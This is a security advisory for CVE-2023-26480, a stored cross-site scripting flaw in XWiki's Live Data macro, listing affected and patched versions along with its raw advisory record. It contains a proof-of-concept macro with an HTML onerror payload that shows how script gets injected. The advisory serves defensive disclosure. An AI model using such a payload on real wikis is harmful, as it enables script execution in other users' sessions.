ghsa-32fq-m2q5-h83g
Vulnerability from github
Impact
A user without script rights can introduce a stored XSS by using the Live Data macro.
For instance:
{{liveData id="movies" properties="title,description"}}
{
"data": {
"count": 1,
"entries": [
{
"title": "Meet John Doe",
"url": "https://www.imdb.com/title/tt0033891/",
"description": "<img onerror='alert(1)' src='foo' />"
}
]
},
"meta": {
"propertyDescriptors": [
{
"id": "title",
"name": "Title",
"visible": true,
"displayer": {"id": "link", "propertyHref": "url"}
},
{
"id": "description",
"name": "Description",
"visible": true,
"displayer": "html"
}
]
}
}
{{/liveData}}
Patches
This has been patched in XWiki 14.9, 14.4.7, and 13.10.10.
Workarounds
No known workaround.
References
https://jira.xwiki.org/browse/XWIKI-20143
For more information
If you have any questions or comments about this advisory: * Open an issue in Jira * Email us at Security ML
{ "affected": [ { "package": { "ecosystem": "Maven", "name": "org.xwiki.platform:xwiki-platform-livedata-macro" }, "ranges": [ { "events": [ { "introduced": "12.10" }, { "fixed": "13.10.10" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Maven", "name": "org.xwiki.platform:xwiki-platform-livedata-macro" }, "ranges": [ { "events": [ { "introduced": "14.0" }, { "fixed": "14.4.7" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Maven", "name": "org.xwiki.platform:xwiki-platform-livedata-macro" }, "ranges": [ { "events": [ { "introduced": "14.5" }, { "fixed": "14.9" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2023-26480" ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2023-03-03T22:53:51Z", "nvd_published_at": "2023-03-02T18:15:00Z", "severity": "HIGH" }, "details": "### Impact\nA user without script rights can introduce a stored XSS by using the Live Data macro.\n\nFor instance:\n\n```\n{{liveData id=\"movies\" properties=\"title,description\"}}\n{\n \"data\": {\n \"count\": 1,\n \"entries\": [\n {\n \"title\": \"Meet John Doe\",\n \"url\": \"https://www.imdb.com/title/tt0033891/\",\n \"description\": \"\u003cimg onerror=\u0027alert(1)\u0027 src=\u0027foo\u0027 /\u003e\"\n }\n ]\n },\n \"meta\": {\n \"propertyDescriptors\": [\n {\n \"id\": \"title\",\n \"name\": \"Title\",\n \"visible\": true,\n \"displayer\": {\"id\": \"link\", \"propertyHref\": \"url\"}\n },\n {\n \"id\": \"description\",\n \"name\": \"Description\",\n \"visible\": true,\n \"displayer\": \"html\"\n }\n ]\n }\n}\n{{/liveData}}\n```\n\n### Patches\nThis has been patched in XWiki 14.9, 14.4.7, and 13.10.10.\n\n### Workarounds\nNo known workaround.\n\n### References\nhttps://jira.xwiki.org/browse/XWIKI-20143\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira](http://jira.xwiki.org/)\n* Email us at [Security ML](mailto:security@xwiki.org)\n", "id": "GHSA-32fq-m2q5-h83g", "modified": "2023-03-03T22:53:51Z", "published": "2023-03-03T22:53:51Z", "references": [ { "type": "WEB", "url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-32fq-m2q5-h83g" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26480" }, { "type": "WEB", "url": "https://github.com/xwiki/xwiki-platform/commit/23d5ea9b23e84b5f3d1f1b2d5673fe8c774d0d79" }, { "type": "WEB", "url": "https://github.com/xwiki/xwiki-platform/commit/556e7823260b826f344c1a6e95d935774587e028" }, { "type": "PACKAGE", "url": "https://github.com/xwiki/xwiki-platform" }, { "type": "WEB", "url": "https://jira.xwiki.org/browse/XWIKI-20143" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L", "type": "CVSS_V3" } ], "summary": "XWiki-Platform vulnerable to stored Cross-site Scripting via the HTML displayer in Live Data" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.